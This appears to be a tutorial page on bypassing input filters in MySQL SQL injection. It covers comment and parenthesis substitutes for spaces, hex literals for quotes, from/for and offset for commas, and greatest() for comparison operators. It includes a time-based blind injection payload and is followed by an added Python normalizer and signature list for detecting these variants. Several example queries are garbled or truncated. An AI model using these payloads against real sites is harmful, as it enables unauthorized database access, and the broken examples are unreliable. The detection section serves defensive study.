1. Space bypass (using inline comments /* */):
The most basic bypass: wherever a space is filtered, an inline comment /* */ takes its place, because MySQL treats the comment as a token separator.
2. Parentheses instead of spaces:
If spaces are filtered but parentheses are not, parentheses can be used to bypass the filter.
In MySQL, parentheses enclose subqueries, so any expression that evaluates to a result can be wrapped in parentheses, and no space is needed on either side of the brackets.
For example:
select(user())from where(1=1)and(2=2)
This technique is often seen in time-based blind injection, for example:
id=1%27and(sleep(mid(database()from(1)for(1))=109))%
(The from ... for form is the comma bypass described in item 4 below.)
The payload above uses neither a comma nor a space. It guesses that the ASCII code of the first character of database() is 109; if the guess is right, the page load is delayed.
3. Quote bypass (using hex):
Quotation marks are usually needed in the final where clause. The following SQL statement is a simple one that lists all the fields of the users table:
select column_name from where table_name="users"
If quotation marks are filtered, the where clause above cannot be used as written, so the string has to be supplied as a hex literal instead.
The hexadecimal encoding of the string users is 7573657273, so the SQL statement becomes:
select column_name from where table_name=0x7573657273
4. Comma bypass (using from ... for, or offset):
Blind injection relies on substr(), mid() and limit, and all three normally take commas. For substr() and mid(), the comma can be replaced by the from ... for form:
select substr(database() from 1 for 1); select mid(database() from 1 for 1);
For limit, the comma form can be replaced by offset:
... limit 0,1 # is equivalent to the following SQL statement: ... limit 1 offset 0
5. Comparison operator (<, >) bypass (using greatest()):
Similarly, blind injection normally uses a comparison operator to run a binary search over character values. If the comparison operators are filtered, greatest() can be used instead.
The most common blind injection statement:
select from where id=1 and ascii(substr(database(),0,1)) >
If the comparison operator is filtered, the statement above cannot be used, and greatest() takes the operator's place. greatest(n1, n2, n3, ...) returns the largest of its arguments.
Rewritten with greatest(), the statement above becomes:
select from where id=1 and greatest(ascii(substr(database(),0,1)) = -
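An added example, not part of the original page, from the detection side: a normalizer that undoes the five evasions above (comment as space, glued parentheses, hex literals, from/for and greatest() by name) before signature matching, so the differently spelled variants of a payload reduce to the same text. The sample values are constructed here, modelled on the items above.

```python
import re

# Constructed sample values (not from the page) modelled on items 1-5 above.
SAMPLES = [
    "1'/**/and/**/(sleep(5))#",                          # item 1: comment as space
    "1' and (select(user())from(dual)where(1=1))#",      # item 2: parentheses
    "x' or table_name=0x7573657273#",                     # item 3: hex for 'users'
    "1' and ascii(substr(database() from 1 for 1))>64#",  # item 4: from/for, no comma
    "42",                                                 # benign id
    "O'Reilly",                                           # benign apostrophe
]

def _hex_to_str(m):
    """Decode a 0x... literal into a quoted string; leave odd-length hex alone."""
    try:
        return "'" + bytes.fromhex(m.group(1)).decode("latin-1") + "'"
    except ValueError:
        return m.group(0)

def normalize(value: str) -> str:
    """Canonicalize a parameter value so that one signature set covers
    the spaced, commented, parenthesized and hex-encoded spellings."""
    s = value.lower()
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)        # /**/ -> space (item 1)
    s = re.sub(r"\b0x([0-9a-f]+)\b", _hex_to_str, s)    # 0x7573657273 -> 'users' (item 3)
    s = re.sub(r"([()])", r" \1 ", s)                   # split tokens glued to ( ) (item 2)
    return re.sub(r"\s+", " ", s).strip()

# Signatures written against the normalized form. substr/mid with FROM ... FOR
# (item 4) and greatest() (item 5) need no comma or comparison operator, so
# they are matched by name.
SIGNATURES = [
    r"\bsleep\s*\(",
    r"\b(select|union)\b.*\bfrom\b",
    r"\b(substr|substring|mid)\s*\(.*\bfrom\b.*\bfor\b",
    r"\bgreatest\s*\(",
    r"\btable_name\s*=\s*'",
    r"\b(and|or)\b\s*\(?\s*\d+\s*=\s*\d+",
]

def is_suspicious(value: str) -> bool:
    """True if any signature matches the normalized value."""
    n = normalize(value)
    return any(re.search(p, n) for p in SIGNATURES)

def scan(values=SAMPLES) -> dict:
    """Map each sample value to its verdict; the four payloads flag, the two benign values do not."""
    return {v: is_suspicious(v) for v in values}
```

Normalization narrows the gap a blocklist leaves but does not close it; parameterized queries remain the control that makes every bypass on this page irrelevant.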
SQL injection Bypass technique